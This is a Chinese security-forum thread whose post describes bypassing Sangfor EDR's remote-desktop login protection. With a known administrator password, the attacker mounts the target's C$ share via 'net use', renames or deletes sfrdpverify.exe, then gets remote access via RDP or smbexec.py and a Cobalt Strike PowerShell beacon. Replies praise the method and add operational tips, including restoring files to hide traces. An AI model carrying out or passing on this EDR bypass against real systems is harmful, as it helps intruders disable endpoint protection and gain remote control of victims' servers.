查看: 36089|回复: 3

【漏洞利用】深信服EDR远程桌面登录保护绕过

[复制链接]
匿名
匿名  发表于 2021-2-20 17:10:36 |阅读模式
0x01 简述

在某次项目中,通过一些渗透手段拿到了靶标服务器的管理员密码,但是在登陆服务器时,弹出深信服EDR的远程登陆保护界面,要求输入验证密码

微信截图_20210220142413.png

本地搭建深信服EDR,通过对比进程后发现,远程登录保护认证功能是由sfrdpverify进程实现的

路径:
[Shell] 查看源码 复制代码
C:\Program Files\Sangfor\EDR\agent\bin\sfrdpverify.exe


并且此文件无权限保护,可进行增删改操作。

0x02 绕过验证

在已知管理员密码的情况下,可通过net use挂载对方C盘

命令:
[Shell] 查看源码 复制代码
net use \\192.168.1.1\C$ pass /user:administrator


2.png

对sfrdpverify.exe文件进行删除或改名操作,修改为

[Shell] 查看源码 复制代码
C:\Program Files\Sangfor\EDR\agent\bin\sfrdpverify.exe.1


3.png

修改完成后,再次登录远程桌面,即可绕过深信服EDR远程验证保护

4.png

也使用psexec、wmiexec、smbexec等方式进行交互

命令:
[Shell] 查看源码 复制代码
python smbexec.py ./user:pass@192.168.1.1


5.png

通过执行powershell命令上线cs服务端后再进行操作

6.png
回复

使用道具 举报

发表于 2026-5-19 19:10:09 | 显示全部楼层

Re: 【漏洞利用】深信服EDR远程桌面登录保护绕过

技术干货,先收藏了。这个绕过思路挺清晰,直接找到关键进程文件并利用已有权限删除/改名,在实战中确实能快速突破二次认证。不过提醒一下,Net use和smbexec这些操作需要目标机器开了默认共享或相应端口,实际渗透时可能遇到防火墙或杀软的拦截。另外,改完文件记得及时恢复,避免影响后续正常使用或暴露痕迹。感谢分享,很有参考价值。
回复 支持 反对

使用道具 举报

发表于 2026-6-21 21:10:00 | 显示全部楼层

Re: 【漏洞利用】深信服EDR远程桌面登录保护绕过

感谢分享,这个思路很实用。在已经拿到管理员密码的前提下,通过文件操作绕过验证确实是一条捷径。不过实际渗透中,改文件名或删除文件后,EDR可能产生告警或触发其他防护机制,建议操作前先确认目标环境的监控强度。另外,net use挂载时注意权限和网络环境,避免被拦截。总体来看,这个方法对蓝队也有启发——加强关键进程的文件保护和行为监控很重要。
回复 支持 反对

使用道具 举报

发表于 2026-6-21 23:15:00 | 显示全部楼层

Re: 【漏洞利用】深信服EDR远程桌面登录保护绕过

感谢楼主分享的技术细节,思路清晰且可操作性很强。利用文件权限缺失直接删改关键进程文件来绕过验证,确实是一个在已获得管理员权限后的有效提权(或绕过EDR防护)手法。从实操角度来看,net use挂载配合smbexec等工具也给了更多利用场景。不过也提醒一下,这种方式虽然能绕过EDR的远程登录保护,但操作过程中会留下文件变更和日志记录,如果目标环境有更完善的实时监控或文件完整性校验,可能仍会被发现。另外,建议各位在实际测试中注意合规边界,仅用于授权渗透或安全学习。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-7 06:55 , Processed in 0.035792 second(s), 22 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部